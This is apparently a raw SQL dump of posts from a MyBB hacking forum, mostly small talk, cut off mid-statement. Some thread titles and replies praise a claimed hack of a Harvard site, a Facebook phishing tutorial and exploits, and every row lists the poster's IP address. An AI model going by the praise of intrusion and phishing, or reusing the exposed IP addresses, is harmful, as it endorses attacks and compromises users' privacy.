('3564', '662', '3561', '7', 'RE: Is this how you treat me?', '0', '1', 't3h jok3r', '1349496458', '[quote=\'flamingworm\' pid=\'3561\' dateline=\'1349496260\'] Isn\'t iPownaholic™ a previous admin or something...and what did he do. Can anyone summarize? [/quote] He was banned over a misunderstanding a couple of weeks ago and a few days ago he came back and decided to help LH out and I gave him another chance by making him a Staff member but when his ban expired the system took him down to the normal members group instead of keeping him in the staff group so he thought I kicked him out and he got pissed off etc and without waiting for a clarification or an answer to what really happened he created this thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c8d210986571bb4f4097768434e8288b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3565', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '222', 'Exposé', '1349496516', 'Hehe oh..I mean that is understandable....don\'t think you should have raged iPownaholic™ about it tho...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a728c28e0f6c3bca86903e3dacdf84ee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3566', '43', '105', '7', 'RE: How did you find us?', '0', '222', 'Exposé', '1349496585', 'thanks... iTzIpod u secret mod u :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '636107768b77d87d3dc7367bf73b121c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3567', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349496878', 'Yea I know I made a mistake. Could someone please close this thread or junk it please. Thanks', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'dc7732d4af5f6e01d783d0d9a5f933aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3568', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '222', 'Exposé', '1349496945', 'You should buy elite and then you can close your own thread :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '43ddf8f58b176835932675d6b9b80f49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3569', '662', '3568', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349497230', '[quote=\'flamingworm\' pid=\'3568\' dateline=\'1349496945\'] You should buy elite and then you can close your own thread :P [/quote] I dont really think I deserve it right now.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '8203a34ca2b44b0e4b81b9daab7eb600', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3570', '190', '665', '56', 'RE: Copy and paste game', '0', '225', 'Graycat', '1349497601', 'Si no solicitaste este cambio de contraseña o crees que recibiste este correo electrónico por error, ponte en contacto con la Ayuda de Origin para recibir asistencia inmediata.', '75.162.63.63', '1268924223', '0', '0', '0', '0', '1', 'bf048ccc8761b15fb5ecb010ebce6bf1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3571', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '222', 'Exposé', '1349497735', 'I know vb.net, html, php, css , and a little java...haha so almost like you :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1b38d26bf93f50700becef9840848031', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3572', '700', '0', '7', 'I\'m thirsty....what\'s your favorite drinks?', '0', '222', 'Exposé', '1349497812', 'Personally I like Snapple the best. And Mt.Dew ofc... What do you guys like to drink?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '64886c475fab22c2997dba4da9e2396c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3573', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '1', 't3h jok3r', '1349498293', 'Thread has been closed upon OPs request.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9870ef77638665f5a3f2b6e6a118e6d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3574', '446', '2058', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1349498353', 'What do you mean by using for advertising? Well we have a lot of forums and content that make us differ from HF and many other hacking communities.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f3d908d496a016c3944912e8e7f30a68', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3575', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '1', 't3h jok3r', '1349498490', 'Oh no. I gotta keep an eye on you now because you are very similar to me. [list] [*] Green Rep [*] HQ and active [*] Know the same coding languages [*] Like the same PS font [*] Uhh do you like girls? [/list] OT: I\'m not a pro at VB but good enough to work my way out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '48cb6366b4bd5bf0be390a30ea4c8735', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3576', '446', '2058', '28', 'RE: This forum is dead..', '0', '222', 'Exposé', '1349498504', 'No No No....like what is your advertising strategy. How are you getting the word out about l33thacking.net?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '493e6a8a98bcff504c37f34745d76e4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3577', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '222', 'Exposé', '1349498663', 'Ewww girls.....haha JK broski. Nah girls are awesome....how old r u lol. Not to sound weird. I\'m 18.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '8944a937c82c9e1a69e408711e09136d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3578', '690', '3577', '69', 'RE: What are your fav or which coding languages do you know?', '0', '1', 't3h jok3r', '1349498728', '[quote=\'flamingworm\' pid=\'3577\' dateline=\'1349498663\'] Ewww girls.....haha JK broski. Nah girls are awesome....how old r u lol. Not to sound weird. I\'m 18. [/quote] Sorry but I don\'t want to post my real age online.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'babfd11be739af317b08fad2bb3d47e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3579', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '222', 'Exposé', '1349498787', 'I don\'t play minecraft but my buddies were saying I should get it for xbox. Idk I still might but meh...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1658b6028959fd37f8f4d3d2b9efe088', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3580', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '1', 't3h jok3r', '1349498834', 'For healthy drinks I would say Milo chocolate milk but when it comes to soft drinks then I think pepsi. I like Mountain Dew too but don\'t drink it that much.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '63e939fa329c277ad66404c7f2a93025', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3631', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '3', '??????????¢™', '1349539854', 'Hell yea, I win I win I win.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '25027ecdf96c3bd9580d0456affc9bc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3632', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '53', 'sirchamp', '1349539865', 'I play minecraft. I can only play on a few cracked servers since my minecraft is also cracked', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ce1511240d714d0f652ddcbd42b207eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3582', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1349498948', 'Lol I haven\'t been here for a week but I wanna create a new group. Can I pl0x. Cause I am so active :P [hr] [b]Name of group:[/b] Fearless [b]Group Description:[/b] We are the elite and fearless members of the web. We aren\'t afraid of anything and are made up of hackers, programmers, social engineers , and L33t members. [b]Group Userbar:[/b] [img]http://i.imgur.com/Wlg3d.gif[/img] [b]Forum Name:[/b] Fearless? (Not sure what this is) [b]Forum Icon(34x34):[/b] [img]http://i.imgur.com/eV4fc.png[/img] [b]Why LH should make this group official:[/b] Well as the leader of the group, I will keep my members that are part of the group active and stay true to it\'s title. We are a l33t group of members and will be the best on the forum!', '74.76.76.132', '1246514308', '1', '0', '222', '1349502666', '1', '5949197501e37bd3cfc05b50546406cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3583', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '222', 'Exposé', '1349499325', 'Never heard of Milo Chocolate Milk....:notbad:...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5957cf07d19981b8c8ba59b6b6385b02', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3584', '701', '0', '49', 'Change Font in Logo?', '0', '222', 'Exposé', '1349499415', 'I mean the logo doesn\'t look bad but the font looks a little awkward. It\'s really basic and idk. Idk if it\'s just me or maybe it need\'s a cooler font :roflol:', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '8f97a963558090dbb54ade73f68c4809', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3585', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '3', '??????????¢™', '1349499659', 'Yea I think so to, yo man your sig is cool.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '20ea28587466c4beb3fa124fd538dfa3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3586', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '205', 'mothered', '1349500606', 'Do you mean the logo, or the \"banner?\" (being \"L33thacking\"). The logo looks pretty good to me, the banner can do with a little bit of work. Perhaps It\'s a job for all you GFX masters.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9c9f9c091668d8a6aa71202d10f84cbb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3587', '679', '3449', '4', 'RE: flamingworm here!', '0', '205', 'mothered', '1349500807', 'I thought you were the original flammingworm from HF. It\'s of no consequence, so It\'s great to have you on board :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'fe88943043e22d10402e6cc0f22e3378', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3588', '700', '3583', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '205', 'mothered', '1349500975', '[quote=\'flamingworm\' pid=\'3583\' dateline=\'1349499325\'] Never heard of Milo Chocolate Milk....:notbad:... [/quote] We have Milo here In Australia, and It\'s nice. Honestly, I only drink water and plain milk. No soft drinks (Soda) or alcohol. Water really satisfies my thirst.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ad4ff81b920f260043a156f33a158ed7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3589', '63', '149', '23', 'RE: [Guide] - Keylogger Information & Removal - [Guide]', '0', '205', 'mothered', '1349501175', 'This Is extremely well documented and elaborated. Well done mate, great work Indeed.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f31a8c1508ebac4164ef28693786326d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3590', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '222', 'Exposé', '1349501231', 'Oh I meant the logo...but I haven\'t see the banner...I can work on it if you guys like :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9cf9572bb8eff4387d9caf3e69231148', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3591', '676', '3427', '12', 'RE: Cracking Tuts/Reverse Enginnering', '0', '205', 'mothered', '1349501384', 'You\'re very welcome Anonymous. Yes, as I mentioned above, because of the nature of the tools, your AV will definitely alert. There\'s no harm In running them In Sandboxie or a VM.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f41e3a5c926243a62e6bbe3c217c67fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3592', '696', '3550', '13', 'RE: [HACKED] http://content.hks.harvard.edu', '0', '205', 'mothered', '1349501541', 'Great work Indeed mate. Love It, good on you.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'fb2d21e500242a6bfb9614c86fb0224a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3593', '702', '0', '35', 'You guys like my new userbar?', '0', '222', 'Exposé', '1349502157', 'I\'m going to make this group for l33thacking. Tell me if you guys like this userbar. I might make the dudes eyes blink too :D [img]http://i.imgur.com/Wlg3d.gif[/img]', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a2005dff77ed8fbc6d7b043d5b12f0c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3594', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349503826', 'Thanks lol....:D. Glad to be here', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'd9c74387c1b00df59eaa9199cf80d3c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3595', '680', '3457', '35', 'RE: Some of my works...', '0', '82', 'iTzIpod', '1349523158', 'Image 3 is broken .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ab6115db422b33b42336739b31272fb0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3596', '567', '2811', '16', 'RE: How to SE McDonalds', '0', '82', 'iTzIpod', '1349523198', 'No problem :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5da76ab5889f6302c5fd2e79f0bdaf4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3597', '698', '3557', '7', 'RE: Skype group anyone?', '0', '82', 'iTzIpod', '1349523510', 'I am. Skype: iTzIpod I\'ll be on daily.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7dbb3811747eaca21a64f95b5a8ccde6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3598', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1349523567', 'How\'d you know I was a Mod.. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43e77b5baf24aecd5c4a693ea34aa223', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3599', '446', '2058', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1349523643', 'Can we use traffic bots on LH?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2493d16dbdc5be6ff3664c2b9fd16fa3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3600', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '82', 'iTzIpod', '1349523675', 'I own 3 Minecraft accounts. 1 is my friend\'s (We share it) And the other 2 are mine.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '544c9e834f4ea54a1e3bb2add5ad92b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3601', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349523745', 'That icon. I dig. ;) What is it supposed to be? Rather use an Angry Bird or something :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'af64ff2f784f539dbf3b3a9fc2dbd19f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3602', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '82', 'iTzIpod', '1349523779', 'I drink water. :* Gotta love that shit.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6971de7a7cd2424fdfbd846f05a09081', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3603', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '82', 'iTzIpod', '1349523818', 'What kind of icon is that? :o Never seen it before.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0ba402fa54277d9c169cf3320b648175', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3604', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349523850', 'http://www.youtube.com/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '460f1c7fdcc064604e29b58eaf7880a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3605', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '62', 'R?????zo?', '1349524346', 'only water here too. gotta keep my body in shape without sodas and alchool :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '42382641e62df57875ff6c35e43e017f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3606', '703', '0', '61', '[Request] Spreading eBook', '0', '100', '??zg???g????61', '1349525172', 'Hey guys, I was wondering if anyone had a way of quickly spreading. Thanks :)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '22be48e7a430f8f39cbfdfe5d66d6ee9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3607', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '100', '??zg???g????61', '1349525307', 'Nice, I like the icon ;DDDDD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '7398790230b7188dd63968353c0ffbf7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3608', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '100', '??zg???g????61', '1349525843', 'Cool xD never actually done this before but I\'ve heard of it.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2d552943b5d21313c3d9c95a27d95bbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3609', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '205', 'mothered', '1349527616', 'Very nice Indeed mate. Will certainly give this a shot. Thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4deedb602b8c7a03b9315c4e97caac58', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3610', '123', '305', '14', 'RE: Top 10 free VPNs', '0', '205', 'mothered', '1349527836', 'I\'ve personally tried Hotspot Shield, TOR, and CyberGhost, and they certainly serve their purpose. Nice thread mate, well put together. Appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '83db39de8fff1d597902aed1b68da975', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3611', '488', '2355', '8', 'RE: What are you listening to?', '0', '199', 'Anonymous™', '1349529558', 'The Script - Hall of Fame ft. will.i.am', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '0609760cfed8ddaa8a452b24c02b4a56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3612', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349529589', 'The Script - Hall of Fame ft. will.i.am', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '859d0036ee0f46053666d782a17a0748', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, 